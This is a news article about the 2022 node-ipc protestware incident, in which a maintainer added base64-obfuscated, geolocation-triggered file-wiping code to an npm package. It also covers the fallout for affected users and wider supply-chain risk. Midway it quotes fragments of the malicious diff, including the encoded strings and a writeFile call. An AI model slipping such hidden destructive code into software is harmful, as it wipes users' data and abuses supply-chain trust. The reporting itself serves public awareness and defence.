A Developer Altered Open Source Software to Wipe Files in Russia

Credit to Author: Dan Goodin, Ars Technica| Date: Sat, 19 Mar 2022 12:00:00 +0000

To revist this article, visit My Profile, then View saved stories.

To revist this article, visit My Profile, then View saved stories.

The developer of a popular open source package has been caught adding malicious code to it, leading to wiped files on computers located in Russia and Belarus. The move was part of a protest that has enraged many users and raised concerns about the safety of free and open source software.

This story originally appeared on Ars Technica, a trusted source for technology news, tech policy analysis, reviews, and more. Ars is owned by WIRED's parent company, Condé Nast.

The application, node.ipc, adds remote interprocess communication and neural networking capabilities to other open source code libraries. As a dependency, node.ipc is automatically downloaded and incorporated into other libraries, including ones like Vue.js CLI, which has more than 1 million weekly downloads.

Two weeks ago, the node.ipc author pushed a new version of the library that sabotaged computers in Russia and Belarus, the countries invading Ukraine and providing support for the invasion, respectively. The new release added a function that checked the IP address of developers who used the node.ipc in their own projects. When an IP address geolocated to either Russia or Belarus, the new version wiped files from the machine and replaced them with a heart emoji.

To conceal the malice, node.ipc author Brandon Nozaki Miller base-64-encoded the changes to make things harder for users who wanted to visually inspect them to check for problems.

This is what those developers saw:

+      const n2 = Buffer.from("Li8=", "base64");
+      const o2 = Buffer.from("Li4v", "base64");
+      const r = Buffer.from("Li4vLi4v", "base64"); 
+      const f = Buffer.from("Lw==", "base64"); 
+      const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); 
+      const e = Buffer.from("cnVzc2lh", "base64"); 
+      const i = Buffer.from("YmVsYXJ1cw==", "base64");

These lines were then passed to the timer function, such as:

+          h(n2.toString("utf8"));

The values for the Base64 strings were:

When passed to the timer function, the lines were then used as inputs to wipe files and replace them with the heart emoji.

+      try { 
+        import_fs3.default.writeFile(i, c.toString("utf8"), function() { 
+        });

“At this point, a very clear abuse and a critical supply chain security incident will occur for any system on which this npm package will be called upon, if that matches a geolocation of either Russia or Belarus,” wrote Liran Tal, a researcher at Snyk, a security company that tracked the changes and published its findings on Wednesday.

Tal found that the node.ipc author maintains 40 other libraries, with some or all of them also being dependencies for other open source packages. Referring to the node.ipc author’s handle, Tal questioned the wisdom of the protest and its likely fallout on the open source ecosystem as a whole.

“Even if the deliberate and dangerous act of maintainer RIAEvangelist will be perceived by some as a legitimate act of protest, how does that reflect on the maintainer’s future reputation and stake in the developer community?" Tal wrote. "Would this maintainer ever be trusted again to not follow up on future acts in such or even more aggressive actions for any projects they participate in?”

RIAEvangelist also came under fire on Twitter and in open source forums. The new malicious code release, wrote one person claiming to work for a US-based organization that operated a server in Belarus, “resulted in executing your code and wiping over 30,000 messages and files detailing war crimes committed in Ukraine by Russian army and government officials.”

The person, who later took down the post and republished it here, said that the purpose of the Belarussian server was to bypass censorship in that country. The organization’s personnel had already been stretched thin since Russia began its invasion of Ukraine on February 24, the person said, and for reasons that aren’t clear, messages from frontline soldiers and other sensitive data was likely gone forever.

“Personally, me and my colleagues are absolutely devastated,” the person wrote. “All I can say [is] that your little shenanigan did more damage to us than Putin or Lukashenka ever could. Professionally, our counsel suggested filing criminal charges federally, and it's likely we'll be proceeding this way.”

The node.ipc update is just one example of what some researchers are calling protestware. Experts have begun tracking other open source projects that are also releasing updates that call out the brutality of Russia’s war. This spreadsheet lists 21 separate packages that are affected.

One such package is es5-ext, which provides code for the ECMAScript 6 scripting language specification. A new dependency named postinstall.js, which the developer added on March 7, checks to see if the user’s computer has a Russian IP address, in which case the code broadcasts a “call for peace.”

“The people of Ukraine are fully mobilized and ready to defend their country from the enemy invasion,” the message translated into English read in part. “91% of Ukrainians fully support their President Volodymyr Zelensky and his response to the Russian attack.” 

The protestware event exposes some of the risks posed when armies of volunteer developers produce the code that’s crucial for hundreds or thousands of other applications to run. By default, most open source software automatically downloads and incorporates new dependency versions. That means an update from a single individual has the potential to throw a wrench in an untold number of downstream applications.

This risk was on full display in January, when the developer of two JavaScript libraries with more than 22 million downloads pushed an update that caused more than 21,000 dependent apps to spew gibberish, prefaced by the words “Liberty Liberty Liberty.” An infinite loop produced by the update sent developers scrambling as they attempted to fix their malfunctioning apps.

The disk-wiping function was added to node.ipc versions 10.1.1 and 10.1.2. Following the outcry over the wiper, the developer released updates that removed the malicious function. Snyk recommends that developers stop using the package altogether. If that’s not possible, the company advises the use of an npm package manager to override the sabotaged versions and pin a known good version.

“Snyk stands with Ukraine, and we’ve proactively acted to support the Ukrainian people during the ongoing crisis with donations and free service to developers world-wide, as well as taking action to cease business in Russia and Belarus,” Tal wrote. “That said, intentional abuse such as this undermines the global open source community and requires us to flag impacted versions of node-ipc as security vulnerabilities.”

This story originally appeared on Ars Technica.

https://www.wired.com/category/security/feed/